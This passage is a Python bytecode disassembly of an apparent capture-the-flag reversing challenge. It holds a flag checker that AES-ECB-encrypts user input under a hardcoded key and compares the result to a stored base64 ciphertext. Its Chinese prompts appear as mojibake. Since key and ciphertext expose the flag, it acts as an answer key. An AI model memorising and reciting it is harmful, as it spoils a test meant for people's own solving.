            [Constants]
                None
                48
            [Disassembly]
                0       RESUME                          0
                2       LOAD_GLOBAL                     1: NULL + len
                12      LOAD_FAST                       0: data
                14      CALL                            1
                22      LOAD_CONST                      1: 48
                24      COMPARE_OP                      2 (<)
                28      POP_JUMP_IF_FALSE               46 (to 122)
                30      LOAD_CONST                      1: 48
                32      LOAD_GLOBAL                     1: NULL + len
                42      LOAD_FAST                       0: data
                44      CALL                            1
                52      BINARY_OP                       10 (-)
                56      STORE_FAST                      1: length
                58      LOAD_FAST                       0: data
                60      LOAD_ATTR                       3: ljust
                80      LOAD_CONST                      1: 48
                82      LOAD_FAST                       1: length
                84      LOAD_ATTR                       5: to_bytes
                104     CALL                            0
                112     CALL                            2
                120     RETURN_VALUE
                122     RETURN_CONST                    0: None
        [Code]
            File Name: PyPro.py
            Object Name: main
            Qualified Name: main
            Arg Count: 0
            Pos Only Arg Count: 0
            KW Only Arg Count: 0
            Stack Size: 5
            Flags: 0x00000003 (CO_OPTIMIZED | CO_NEWLOCALS)
            [Names]
                'input'
                'encode'
                'len'
                'print'
                'range'
                'exit'
                'ord'
                'AES'
                'new'
                'long_to_bytes'
                'key'
                'MODE_ECB'
                'encrypt'
                'PKCS5_pad'
                'base64'
                'b64encode'
                'decode'
            [Locals+Names]
                'enc'
                'i'
                'chiper'
                'result'
                'data'
            [Constants]
                None
                '鍦ㄨ繖閲岃緭鍏ヤ綘鐨刦lag:\n'
                'utf-8'
                44
                'length error!'
                123
                6
                '{'
                -1
                '}'
                'format error'
                1
                '2e8Ugcv8lKVhL3gkv3grJGNE3UqkjlvKqCgJSGRNHHEk98Kd0wv6s60GpAUsU+8Q'
                'flag姝ｇ‘'
                '閿欒'
            [Disassembly]
                0       RESUME                          0
                2       LOAD_GLOBAL                     1: NULL + input
                12      LOAD_CONST                      1: '鍦ㄨ繖閲岃緭鍏ヤ綘鐨刦lag:\n'
                14      CALL                            1
                22      LOAD_ATTR                       3: encode
                42      LOAD_CONST                      2: 'utf-8'
                44      CALL                            1
                52      STORE_FAST                      0: enc
                54      LOAD_GLOBAL                     5: NULL + len
                64      LOAD_FAST                       0: enc
                66      CALL                            1
                74      LOAD_CONST                      3: 44
                76      COMPARE_OP                      55 (!=)
                80      POP_JUMP_IF_FALSE               48 (to 178)
                82      LOAD_GLOBAL                     7: NULL + print
                92      LOAD_CONST                      4: 'length error!'
                94      CALL                            1
                102     POP_TOP
                104     LOAD_GLOBAL                     9: NULL + range
                114     LOAD_GLOBAL                     5: NULL + len
                124     LOAD_FAST                       0: enc
                126     CALL                            1
                134     CALL                            1
                142     GET_ITER
                144     FOR_ITER                        2 (to 150)
                148     STORE_FAST                      1: i
                150     JUMP_BACKWARD                   4 (to 144)
                152     END_FOR
                154     LOAD_GLOBAL                     11: NULL + exit
                164     LOAD_CONST                      5: 123
                166     CALL                            1
                174     POP_TOP
                176     JUMP_FORWARD                    57 (to 292)
                178     LOAD_FAST                       0: enc
                180     LOAD_CONST                      6: 6
                182     BINARY_SUBSCR
                186     LOAD_GLOBAL                     13: NULL + ord
                196     LOAD_CONST                      7: '{'
                198     CALL                            1
                206     COMPARE_OP                      55 (!=)
                210     POP_JUMP_IF_TRUE                17 (to 246)
                212     LOAD_FAST                       0: enc
                214     LOAD_CONST                      8: -1
                216     BINARY_SUBSCR
                220     LOAD_GLOBAL                     13: NULL + ord
                230     LOAD_CONST                      9: '}'
                232     CALL                            1
                240     COMPARE_OP                      55 (!=)
                244     POP_JUMP_IF_FALSE               23 (to 292)
                246     LOAD_GLOBAL                     7: NULL + print
                256     LOAD_CONST                      10: 'format error'
                258     CALL                            1
                266     POP_TOP
                268     LOAD_GLOBAL                     11: NULL + exit
                278     LOAD_CONST                      11: 1
                280     CALL                            1
                288     POP_TOP
                290     NOP
                292     LOAD_GLOBAL                     15: NULL + AES
                302     LOAD_ATTR                       16: new
                322     LOAD_GLOBAL                     19: NULL + long_to_bytes
                332     LOAD_GLOBAL                     20: key
                342     CALL                            1
                350     LOAD_GLOBAL                     14: AES
                360     LOAD_ATTR                       22: MODE_ECB
                380     CALL                            2
                388     STORE_FAST                      2: chiper
                390     LOAD_FAST                       2: chiper
                392     LOAD_ATTR                       25: encrypt
                412     LOAD_GLOBAL                     27: NULL + PKCS5_pad
                422     LOAD_FAST                       0: enc
                424     CALL                            1
                432     CALL                            1
                440     STORE_FAST                      0: enc
                442     LOAD_GLOBAL                     29: NULL + base64
                452     LOAD_ATTR                       30: b64encode
                472     LOAD_FAST                       0: enc
                474     CALL                            1
                482     STORE_FAST                      3: result
                484     LOAD_CONST                      12: '2e8Ugcv8lKVhL3gkv3grJGNE3UqkjlvKqCgJSGRNHHEk98Kd0wv6s60GpAUsU+8Q'
                486     STORE_FAST                      4: data
                488     LOAD_FAST                       3: result
                490     LOAD_ATTR                       33: decode
                510     CALL                            0
                518     LOAD_FAST                       4: data
                520     COMPARE_OP                      40 (==)
                524     POP_JUMP_IF_FALSE               12 (to 550)
                526     LOAD_GLOBAL                     7: NULL + print
                536     LOAD_CONST                      13: 'flag姝ｇ‘'
                538     CALL                            1
                546     POP_TOP
                548     RETURN_CONST                    0: None
                550     LOAD_GLOBAL                     7: NULL + print
                560     LOAD_CONST                      14: '閿欒'
                562     CALL                            1
                570     POP_TOP
                572     RETURN_CONST                    0: None
        '__main__'
    [Disassembly]
        0       RESUME                          0
        2       LOAD_CONST                      0: 0
        4       LOAD_CONST                      1: None
        6       IMPORT_NAME                     0: base64
        8       STORE_NAME                      0: base64
        10      LOAD_CONST                      0: 0
        12      LOAD_CONST                      2: ('AES',)
        14      IMPORT_NAME                     1: Crypto.Cipher
        16      IMPORT_FROM                     2: AES
        18      STORE_NAME                      2: AES
        20      POP_TOP
        22      LOAD_CONST                      0: 0
        24      LOAD_CONST                      3: ('long_to_bytes',)
        26      IMPORT_NAME                     3: Crypto.Util.number
        28      IMPORT_FROM                     4: long_to_bytes
        30      STORE_NAME                      4: long_to_bytes
        32      POP_TOP
        34      LOAD_CONST                      4: 0x554B134A029DE539438BD18604BF114
        36      STORE_NAME                      5: key
        38      LOAD_CONST                      5: <CODE> PKCS5_pad
        40      MAKE_FUNCTION                   0
        42      STORE_NAME                      6: PKCS5_pad
        44      LOAD_CONST                      6: <CODE> main
        46      MAKE_FUNCTION                   0
        48      STORE_NAME                      7: main
        50      LOAD_NAME                       8: __name__
        52      LOAD_CONST                      7: '__main__'
        54      COMPARE_OP                      40 (==)
        58      POP_JUMP_IF_FALSE               8 (to 76)
        60      PUSH_NULL
        62      LOAD_NAME                       7: main
        64      CALL                            0
        72      POP_TOP
        74      RETURN_CONST                    1: None
        76      RETURN_CONST                    1: None